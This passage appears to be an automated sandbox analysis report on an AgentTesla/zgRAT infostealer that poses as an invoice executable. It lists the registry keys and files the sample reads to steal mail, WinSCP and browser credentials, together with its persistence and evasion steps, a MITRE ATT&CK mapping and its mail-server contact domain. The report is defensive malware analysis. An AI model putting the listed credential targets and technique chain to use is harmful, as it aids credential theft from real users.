                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Users\user\AppData\Roaming\txQleCu.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Users\user\Desktop\INVOICE_NO._29998172.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Users\user\AppData\Roaming\txQleCu.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_02E3F650 GetUserNameW,6_2_02E3F650

                Stealing of Sensitive Information

                barindex
                Yara detected zgRAT
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.raw.unpack, type: UNPACKEDPE
                Yara detected AgentTesla
                Source: Yara matchFile source: 00000006.00000002.629144860.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.629486178.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: INVOICE_NO._29998172.exe PID: 6032, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: txQleCu.exe PID: 6656, type: MEMORYSTR
                Source: Yara matchFile source: 5.2.txQleCu.exe.4561c18.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.txQleCu.exe.4561c18.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.txQleCu.exe.45389f8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.txQleCu.exe.45389f8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.txQleCu.exe.450b5d8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.399658088.000000000407C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.440863847.000000000450B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.399658088.0000000004975000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: Yara matchFile source: 00000006.00000002.629144860.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.629486178.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: INVOICE_NO._29998172.exe PID: 6032, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: txQleCu.exe PID: 6656, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected zgRAT
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.raw.unpack, type: UNPACKEDPE
                Yara detected AgentTesla
                Source: Yara matchFile source: 00000006.00000002.629144860.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.629486178.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: INVOICE_NO._29998172.exe PID: 6032, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: txQleCu.exe PID: 6656, type: MEMORYSTR
                Source: Yara matchFile source: 5.2.txQleCu.exe.4561c18.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.txQleCu.exe.4561c18.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.txQleCu.exe.45389f8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.txQleCu.exe.45389f8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.txQleCu.exe.450b5d8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.399658088.000000000407C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.440863847.000000000450B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.399658088.0000000004975000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts121
                Windows Management Instrumentation                		1
                Scheduled Task/Job                		11
                Process Injection                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                Account Discovery                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium1
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Scheduled Task/Job                		Boot or Logon Initialization Scripts1
                Scheduled Task/Job                		3
                Obfuscated Files or Information                		1
                Input Capture                		1
                File and Directory Discovery                		Remote Desktop Protocol1
                Data from Local System                		Exfiltration Over Bluetooth1
                Non-Standard Port                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)12
                Software Packing                		1
                Credentials in Registry                		24
                System Information Discovery                		SMB/Windows Admin Shares1
                Email Collection                		Automated Exfiltration1
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Masquerading                		NTDS211
                Security Software Discovery                		Distributed Component Object Model1
                Input Capture                		Scheduled Transfer11
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script131
                Virtualization/Sandbox Evasion                		LSA Secrets1
                Process Discovery                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common11
                Process Injection                		Cached Domain Credentials131
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                System Owner/User Discovery                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                Remote System Discovery                		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 876157 Sample: INVOICE_NO._29998172.exe Startdate: 26/05/2023 Architecture: WINDOWS Score: 100 47 Snort IDS alert for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 8 other signatures 2->53 7 INVOICE_NO._29998172.exe 7 2->7         started        11 txQleCu.exe 5 2->11         started        process3 file4 31 C:\Users\user\AppData\Roaming\txQleCu.exe, PE32 7->31 dropped 33 C:\Users\user\...\txQleCu.exe:Zone.Identifier, ASCII 7->33 dropped 35 C:\Users\user\AppData\Local\...\tmpEB82.tmp, XML 7->35 dropped 37 C:\Users\...\INVOICE_NO._29998172.exe.log, ASCII 7->37 dropped 55 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->55 57 Uses schtasks.exe or at.exe to add and modify task schedules 7->57 59 Adds a directory exclusion to Windows Defender 7->59 13 INVOICE_NO._29998172.exe 2 7->13         started        17 powershell.exe 21 7->17         started        19 schtasks.exe 1 7->19         started        61 Multi AV Scanner detection for dropped file 11->61 63 Machine Learning detection for dropped file 11->63 21 txQleCu.exe 2 11->21         started        23 schtasks.exe 1 11->23         started        signatures5 process6 dnsIp7 39 gimpex-imerys.com 5.100.152.24, 49697, 49698, 587 PUBLIC-DOMAIN-REGISTRYUS United Kingdom 13->39 41 mail.gimpex-imerys.com 13->41 43 192.168.2.1 unknown unknown 13->43 25 conhost.exe 17->25         started        27 conhost.exe 19->27         started        45 mail.gimpex-imerys.com 21->45 65 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 21->65 67 Tries to steal Mail credentials (via file / registry access) 21->67 69 Tries to harvest and steal browser information (history, passwords, etc) 21->69 29 conhost.exe 23->29         started        signatures8 process9

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                INVOICE_NO._29998172.exe25%ReversingLabsWin32.Trojan.Pwsx
                INVOICE_NO._29998172.exe34%VirustotalBrowse
                INVOICE_NO._29998172.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\txQleCu.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\txQleCu.exe25%ReversingLabsWin32.Trojan.Pwsx

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                gimpex-imerys.com0%VirustotalBrowse
                mail.gimpex-imerys.com0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.carterandcone.com0%URL Reputationsafe
                http://www.carterandcone.comj0%URL Reputationsafe
                http://www.fontbureau.comiona0%URL Reputationsafe
                http://www.fontbureau.comiona0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.carterandcone.comitk0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.founder.com.cn/cnhtn0%Avira URL Cloudsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://gimpex-imerys.com0%Avira URL Cloudsafe
                http://mail.gimpex-imerys.com0%Avira URL Cloudsafe
                http://www.sajatypeworks.compew0%Avira URL Cloudsafe
                http://www.agfamonotype.50%Avira URL Cloudsafe
                http://www.fontbureau.comttco0%Avira URL Cloudsafe
                http://www.founder.com.cn/cn/t-F0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                gimpex-imerys.com
                		5.100.152.24
                		truetrueunknown
                mail.gimpex-imerys.com
                		unknown
                		unknowntrueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.0INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.fontbureau.comINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.fontbureau.com/designersGINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cnhtnINVOICE_NO._29998172.exe, 00000000.00000003.363028287.0000000005DD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designers?INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://gimpex-imerys.comINVOICE_NO._29998172.exe, 00000006.00000002.629144860.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, txQleCu.exe, 0000000C.00000002.629486178.0000000002C40000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://mail.gimpex-imerys.comINVOICE_NO._29998172.exe, 00000006.00000002.629144860.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, txQleCu.exe, 0000000C.00000002.629486178.0000000002C40000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.sajatypeworks.compewINVOICE_NO._29998172.exe, 00000000.00000003.360891857.0000000005DDB000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
